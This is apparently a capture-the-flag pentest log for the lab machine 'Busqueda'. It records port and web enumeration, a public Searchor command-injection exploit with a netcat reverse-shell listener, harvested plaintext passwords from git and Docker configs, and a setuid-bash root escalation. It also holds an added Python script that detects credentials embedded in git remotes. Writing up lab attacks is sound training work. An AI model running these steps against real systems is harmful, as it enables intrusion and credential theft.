Busqueda
Pentest Log: 2025-08-03
Target Information
- Machine Name: Busqueda
- IP Address: 10.129.161.159
- Operating System: Linux
ip=10.129.161.159
Enumeration
Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
found
Powered by Flask and Searchor 2.4.0
Google 'searcher 2.4 0 exploit', found
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection
Exploitation
Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
Exploit Execution
Exploit Method
Tool / Script Used:
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection
nc -lvnp 9001
./exploit.sh http://searcher.htb 10.10.14.25
Privilege Escalation
Current Access
- User: svc
- Groups: svc
- Shell Type: web shell
Enumeration
Git:
cat .git/config
found
url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
Reusing the password, we successfully SSH in as svc
ssh svc@$ip
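A defensive check for the finding above, as an added example that is not part of the original log: it walks a directory tree and reports git remote URLs that carry an embedded password, redacting the secret in its output. The sample config, host name and credentials are constructed.

```python
import os
import re
from urllib.parse import urlsplit

# Matches "url = ..." and "pushurl = ..." lines inside a git config file.
URL_LINE = re.compile(r"^\s*(?:push)?url\s*=\s*(\S+)", re.IGNORECASE)

def find_embedded_credentials(config_text):
    """Return (user, host, redacted_url) for each remote URL carrying a password."""
    findings = []
    for line in config_text.splitlines():
        m = URL_LINE.match(line)
        if not m:
            continue
        raw = m.group(1)
        parts = urlsplit(raw)
        if parts.password:
            # Never echo the secret itself into a report or log.
            redacted = raw.replace(":" + parts.password + "@", ":***@", 1)
            findings.append((parts.username, parts.hostname, redacted))
    return findings

def scan_tree(root):
    """Check every .git/config under root; returns {config_path: findings}."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in filenames:
            path = os.path.join(dirpath, "config")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_embedded_credentials(fh.read())
            if hits:
                report[path] = hits
            dirnames[:] = []  # no need to descend into .git internals
    return report

# Constructed sample: one remote with a password in the URL, one without.
SAMPLE_CONFIG = '''[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = http://alice:ExamplePassw0rd@git.example.internal/alice/site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = ssh://git@git.example.internal/alice/site.git
'''

if __name__ == "__main__":
    for user, host, url in find_embedded_credentials(SAMPLE_CONFIG):
        print(f"credential for {user}@{host} in remote URL: {url}")
```

Any hit means the password should be rotated and the remote switched to a credential helper or SSH key, since the config file is readable by whoever can read the deployed working tree.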
Sudo:
sudo -l
found
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e
Piping the output into jq, we found another password:
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
Go to gitea.searcher.htb and log in as administrator with the password just found; we are able to view the system-checkup.py source code.
Privilege Escalation Exploit
Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: system-checkup.py
- Reference / Source: N/A
Exploit Steps
- Smash to root
cd /tmp
vim full-checkup.sh
#! /bin/bash
chmod +s /bin/bash
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
bash -p